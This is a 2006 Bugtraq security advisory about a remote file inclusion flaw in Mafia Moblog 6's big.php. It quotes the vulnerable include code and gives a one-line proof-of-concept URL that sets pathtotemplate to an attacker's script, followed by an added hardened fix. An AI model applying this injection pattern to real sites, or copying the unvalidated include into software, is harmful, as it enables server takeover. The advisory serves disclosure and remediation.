Bugtraq mailing list archives
Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability
From: sh3ll () sh3ll ir
Date: 10 Aug 2006 13:06:23 -0000
-------------------------------------------------------------------------------------------
Mafia Moblog pathtotemplate Remote File Inclusion
-------------------------------------------------------------------------------------------
Author   : Sh3ll
Date     : 2006/04/30
HomePage : http://www.sh3ll.ir
Contact  : sh3ll[at]sh3ll[dot]ir
-------------------------------------------------------------------------------------------

Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Mafia Moblog
Version     : 6
Vendor      : http://mafia.pearlabs.org
Class       : Remote File Inclusion
Risk        : High
Summary     : A free, fully customizable, open-source moblog script that will run on any platform that is PHP and MySQL compatible.
-------------------------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
The problem is in big.php, where the variable $pathtotemplate is passed to include() without ever being declared or initialized in the script. An attacker who controls the value can make big.php include a file of their choice.

----------------------------------------big.php--------------------------------------------
...
<?php
include("info.php");
include("template.php");
if (file_exists("$pathtotemplate/includes.php")) {
    include("$pathtotemplate/includes.php");
}
include("$pathtotemplate/big.php");
?>
...
-------------------------------------------------------------------------------------------

PoC:
~~~
http://www.target.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]

Solution:
~~~~~~~~
Sanitize the variable $pathtotemplate in big.php.
-------------------------------------------------------------------------------------------

Note:
~~~~
Vendor contacted, but no response, so apply a dirty patch yourself.
-------------------------------------------------------------------------------------------

Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
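The advisory's "sanitize $pathtotemplate" fix, worked through as an added example that is not part of the advisory or of the Mafia Moblog code. It assumes templates live in a templates/ directory beside big.php and that the template name comes from configuration (the $templateName value is a constructed placeholder); the point is that request data never decides the include path.

```php
<?php
// Added example: hardened replacement for the include logic in big.php.
// The original relied on $pathtotemplate being set somewhere; with
// register_globals on, a ?pathtotemplate= query parameter set it instead.

// 1. Discard anything a register_globals-style environment may have injected.
unset($pathtotemplate);

// 2. Take the template name from configuration only (placeholder value here;
//    in the real script it would be set in info.php) and restrict it to a
//    character set that cannot express "/", "..", ":" or a URL scheme.
$templateName = 'default';
if (!preg_match('/^[A-Za-z0-9_-]+$/', $templateName)) {
    http_response_code(500);
    exit('Invalid template configuration');
}

// 3. Build the path from a fixed base directory and confirm the resolved
//    directory is still inside it (catches traversal and symlink tricks).
$base = realpath(__DIR__ . '/templates');
$pathtotemplate = ($base === false) ? false : realpath($base . '/' . $templateName);
if ($base === false || $pathtotemplate === false
    || strncmp($pathtotemplate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
    http_response_code(500);
    exit('Template directory not found');
}

// 4. Include only local files under the verified directory; is_file() rather
//    than file_exists() so a directory or stream wrapper cannot satisfy the check.
if (is_file("$pathtotemplate/includes.php")) {
    include "$pathtotemplate/includes.php";
}
include "$pathtotemplate/big.php";
```

Independently of the code change, setting register_globals=Off and allow_url_fopen=Off (and allow_url_include=Off on PHP builds that have it) in php.ini removes the precondition for this whole class of bug and is worth checking on any 2006-era PHP deployment.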